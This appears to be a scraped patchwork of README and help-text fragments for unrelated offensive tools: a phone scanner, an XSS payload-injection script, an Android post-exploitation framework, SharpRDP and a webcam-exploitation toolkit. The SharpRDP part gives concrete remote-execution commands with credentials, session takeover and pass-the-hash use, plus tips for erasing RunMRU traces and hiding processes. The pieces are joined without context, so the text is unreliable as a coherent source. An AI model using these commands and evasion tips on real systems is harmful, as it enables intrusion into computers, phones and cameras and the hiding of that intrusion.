optional arguments: -h, --help show this help message and exit -p <phone>, --phone <phone> The phone number to scan. -i <inputfile>, --input <inputfile> List of phone numbers to scan. -o <outputfile>, --output <outputfile> Output to save scan results. -s <scanner>, --scanner <scanner> The scanner to use. --recon Launch custom format reconnaissance. --no-ansi Disable colored output. - u, --update Update Phonia Toolkit.
Usage of the Phonia Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
This is the extended version based on the initial idea already published as "xssfinder". This private version allows an attacker to perform not only GET but also POST requests. Additionally its possible to proxy every request through Burp or another tunnel. First steps Rename the example.app-settings.conf to app-settings.conf and adjust the settings. It should work out of the box but depending on the target I would recommend to resize the chunk sizes.
Execution This tool does not expect any arguments via CLI, so just type: python3 extended-xss-search.py
Configuration Its possible to set a lot of options and settings, so here are some explanations.
Files The main config file is the "app-settings.conf", everything has to be done in that file! Besides that, there are some other files which allow to set more complex data like headers, urls and cookies. config/cookie-jar.txt Use this file to add a cookie string. I usually copy the one which you can see in every burp request. Please just copy the value of the "Cookie:"-header. A sample input is in the default file. config/http-headers.txt This file defines the http headers which are added to the request and manipulated (payload is added to each one). The most important ones are already in the file. But feel free to add more. config/parameters.txt The tool has the option to brute force get and post parameters. In that case those parameters (+ those in the query string) will be used. Each parameter gets the payload as value. Most important are already in that file. config/urls-to-test.txt Thats the file you need! Please add here your links to scan. The following formats are allowed:
When the last case is detected an "http://" is prepended. This tool is intended to work with a good list of urls. A good way to get one is to just export it using burp. Then you have a valid list of urls. All you need to do ist to just add your cookies. logs/ This is the log folder where everything gets logged to!
Settings The app-settings.conf defined the program workflow. Its the most important file, you can activate/deactive different modules there. Basic settings HTTPTimeout Some requests can take long. Here you can define the max. execution time of one request. I recommend values between 2 and 6 seconds. MaxThreads The more threads, the faster the script is - but since we are dealing with a lot of connections I usually keep this below 10 on my personal computer and arround 30 on my VPS. Attack types OnlyBaseRequest Setting this to true will result in only "base requests" - this means the url lists is just spidered and interesting parameters extracted. You could use that to fill you burp sitemap quickly. UsePost Use can skip POST requests setting this to "false" UseGet This is similar - skip GET requests if set to "false" Attack type settings GetChunkSize How many GET parameters to test with one request? PostChunkSize How many POST parameters to test with one request? Tunneling Its also possible to use a tunnel, e.g. "127.0.0.1:8080" (Burp Proxy), to monitor all traffic within Burp. Active Setting this to "true" will force the script to use a tunneled connection. Tunnel Set here your proxy server "ip:port". The result is the following one, when you open Burp you can watch your http history:
Ghost Framework is an Android post exploitation framework that uses an Android Debug Bridge to remotely access an Android device. Ghost Framework gives you the power and convenience of remote Android device administration.
Getting started
Ghost installation
cd ghost
chmod +x install.sh
./install.sh
Ghost uninstallation
cd ghost
chmod +x uninstall.sh
./uninstall.sh
Ghost Framework execution
To execute Ghost Framework you should execute the following command.
ghost
Why Ghost Framework
Accessing device shell.
Ghost Framework can be used to access the remote Android device shell without using OpenSSH or other protocols.
Emulating device button presses.
Ghost Framework can be used to emulate button presses on the remote Android device.
Removing device password.
Ghost Framework can be used to remove the remote Android device password if it was forgotten.
Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
To compile open the project in Visual Studio and build for release. Two DLLs will be output to the Release directory, you do not need those because the DLLs are in the assembly. If you do not want to use the provided DLLs you will need to .NET SDK to create the AxMSTSCLib.dll DLL. To create it you'll need to run aximp from the SDK on mstscax.dll. %<SDK dir>%\aximp.exe %windir%\system32\mstscax.dll. Those DLLs will need to be referenced by the project to get the Interop DLLs created. You will also need to compress the DLLs with Deflate and name them AxInterop.MSTSCLib.dll.bin and Interop.MSTSCLib.dll.bin Usage
Regular RDP connection and execution SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
Exec program as child process of cmd or powershell SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password exec=cmd
Use restricted admin mode SharpRDP.exe computername=target.domain command="C:\Temp\file.exe"
Connect first host drives SharpRDP.exe computername=domain.target command="\\tsclient\C\Temp\file.exe" username=domain\user password=password connectdrive=true
Execute command elevated through Run Dialog - CURRENTLY BUGGED SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=winr
Ask to take over logon session SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password takeover=true
If restricted admin mode is enabled on the target do not specify any credentials and it will use the current user context. Can PTH or make_token in beacon or runas /netonly on a Windows system. All execution starts with the Windows run dialog (Win+R). There will be a registry key created at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU with the command that you executed. If you want to remove this you can use: CleanRunMRU: Get or clear RunMRU values Keep in mind if you execute a program like msbuild (I'm sure there are others) a cmd window will pop up while the process is running. If you do it would probably be best to migrate the process and kill the original. The required DLLs are compiled into the assembly and app domain assembly resolve event is used. Because of the size of the DLLs they are compressed and decompressed at runtime (so they could meet beacon's 1MB size limit). Blog about it found here SharpRDP Also part of MoveKit
optional arguments: -h, --help show this help message and exit -b [1|2], --brand [1|2] Choose the brand of IP Webcam. (1)Netwave, (2)GoAhead. -o <outputfile>, --output <outputfile> Output into path you input. --timeout <timeout> Timeout in seconds. -t <tasks>, --task <tasks> Run tasks number of connects in parallel. -c <count>, --count <count> The number of IP you want to get from ZoomEye. -q, --quiet Quiet mode. -v, --verbose Verbose mode. -a <add ress>, --address <address> IP:port address of the webcam. -i <inputfile>, --input <inputfile> List of IP:port addresses of webcams. --shodan <API> Your Shodan API key. --zoomeye <API> Your ZoomEye API key. -u, --update Update Entropy Toolkit.
Usage of the Entropy Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, federal, and international laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
